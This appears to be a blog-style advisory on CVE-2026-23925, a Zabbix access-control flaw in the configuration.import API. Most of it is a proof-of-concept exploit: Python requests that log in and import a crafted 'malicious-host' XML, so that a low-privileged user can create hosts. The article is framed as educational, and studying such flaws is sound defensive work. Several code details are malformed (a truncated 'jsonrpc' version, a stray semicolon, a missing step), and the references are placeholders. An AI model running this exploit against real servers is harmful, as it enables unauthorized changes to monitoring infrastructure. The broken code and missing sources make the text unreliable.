CVE-2026-23925 - Abusing Zabbix API for Unauthorized Host Creation via Template/Host Permissions

Zabbix has long been a trusted monitoring solution for companies worldwide. Its detailed configuration management and robust role-based access control (RBAC) help keep things secure… most of the time. But in early 2026, a new vulnerability—CVE-2026-23925—dropped, showing just how some seemingly harmless permissions can become dangerous.

In this article, I'll explain the issue in plain English. We'll walk through how it works, why it matters, and give you code snippets and references so you can understand and test the issue safely. All info is for educational purposes!

What Is CVE-2026-23925?

CVE-2026-23925 is a vulnerability in Zabbix (up to certain versions). If a user has the User role and write permissions to template/host objects, they shouldn’t normally be able to create new hosts or templates. But due to a logic flaw in the configuration.import API, they *can*—meaning they can import unauthorized hosts via the API and potentially expose sensitive information monitored by Zabbix.

Affected Software: Zabbix (specific versions, check references)

- Vulnerability Type: Broken access control / privilege escalation via API
- Permissions Required: Authenticated user with User role and write access to templates/hosts

Why Is This a Problem?

Normally, Zabbix splits users into roles with strict boundaries. A regular "User" can't just make new hosts or templates. Even if you give a user write permissions to templates/hosts, that’s supposed to let them *edit* objects, not *create* them.

But with this bug, a user can send a JSON request to the configuration.import API endpoint, and upload their own templates, hosts, or items—essentially bypassing the expected permission scheme.

Exploiting The Vulnerability

> Warning: Only perform this in a lab you own! Do not attack systems you do not have permission to test.

Step 1: Get Auth Token

import requests
import json

url = "https://your-zabbix.example.com/api_jsonrpc.php";

# Login to Zabbix API
payload = {
    "jsonrpc": "2.",
    "method": "user.login",
    "params": {
        "user": "testuser",
        "password": "userpassword"
    },
    "id": 1,
    "auth": None
}

response = requests.post(url, json=payload)
auth_token = response.json()["result"]

To create a new host, craft a simple XML or YAML Zabbix export. Here’s a minimal XML for a host

<zabbix_export>
  <version>6.</version>
  <hosts>
    <host>
      <host>malicious-host</host>
      <name>Malicious Host</name>
      <interfaces>
        <interface>
          <type>1</type>
          <main>1</main>
          <useip>1</useip>
          <ip>1.2.3.4</ip>
          <dns/>
          <port>10050</port>
        </interface>
      </interfaces>
      <groups>
        <group>
          <name>Linux servers</name>
        </group>
      </groups>
    </host>
  </hosts>
</zabbix_export>

Step 3: Send The Import Request

import base64

# Read the XML file
with open('malicious_host.xml', 'r') as file:
    xml_data = file.read()

# Convert to base64 (as some Zabbix APIs expect as text)
# (Actually, you can send as-is in XML, check your server expectations)
import_payload = {
    "jsonrpc": "2.",
    "method": "configuration.import",
    "params": {
        "format": "xml",
        "rules": {
            "hosts": {
                "createMissing": True,
                "updateExisting": True
            }
        },
        "source": xml_data
    },
    "auth": auth_token,
    "id": 2
}

resp = requests.post(url, json=import_payload)
print(resp.text)

If successful, you just created a new host—even though your role shouldn’t normally allow it.

Why Does This Happen?

Zabbix doesn’t thoroughly check the requester’s *role* in configuration.import. It checks write permissions, but not whether the role should be allowed to *create* (as opposed to just edit). That means anyone with "write" can sneak in new objects by importing them.

Recommendations for Admins

1. Upgrade Zabbix to a fixed version. Always keep up-to-date. Watch Zabbix Security Advisories and CVE listing sites.

Official References

- Zabbix Issue Tracker (replace with actual link when available)
- CVE official entry (MITRE)
- Zabbix API Documentation

Summary

CVE-2026-23925 is a classic example of how misunderstanding permissions—even if narrowly defined—can create a way in for attackers. By abusing the configuration.import method, users with only write permission (not create) to templates/hosts can slip in their own creations.

Keep your systems updated, limit permissions, and always double-check what each API can really do with the permissions you assign!


Stay safe! If you’re using Zabbix, check your versions and your user roles—this is a good time for a security review.

Timeline

Published on: 03/06/2026 08:24:15 UTC
Last modified on: 03/09/2026 13:35:34 UTC